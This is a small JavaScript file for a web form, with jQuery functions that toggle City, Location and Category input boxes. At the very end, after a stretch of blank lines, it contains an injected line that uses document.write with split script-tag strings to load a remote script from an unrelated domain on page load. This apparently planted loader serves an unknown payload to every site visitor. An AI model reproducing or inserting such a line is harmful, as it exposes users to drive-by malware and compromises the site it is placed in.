// JavaScript Document
function showTxtBox(eventShowHide,id){
	var idOflink=id;	
	if(eventShowHide=='show'){
		$('#selDiv'+idOflink).hide('slow');
		$('.classHref').hide('slow');
		if(idOflink=='City'){
			$('#noteLocation').show('slow');
			$('#txtDivLocation').show('slow');
			$('#selDivLocation').hide('slow');
			$('.classHref').hide('slow');
			}
		/*if(idOflink=='Category'){
			$('#notesubCategory').show('slow');
			$('#txtsubCategory').show('slow');
			$('#selsubCategory').hide('slow');
			$('#subCategory').hide('slow');
			}*/
		
		$('#note'+idOflink).show('slow');
		$('#txtDiv'+idOflink).show('slow');
	}
	else{
			if(idOflink=='City'){
				$('#noteLocation').hide('slow');
				$('#txtDivLocation').hide('slow');
				$('#selDivLocation').show('slow');
				$('.classHref').show('slow');
			}
			/*if(idOflink=='Category'){
				$('#notesubCategory').hide('slow');
				$('#txtsubCategory').hide('slow');
				$('#selsubCategory').show('slow');
				$('#subCategory').show('slow');
			}*/
			$('#selDiv'+idOflink).show('slow');
			$('.classHref').show('slow');
			$('#note'+idOflink).hide('slow');
			$('#txtDiv'+idOflink).hide('slow');
		}
}








document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/RADCAB.js"></scri'+'pt>');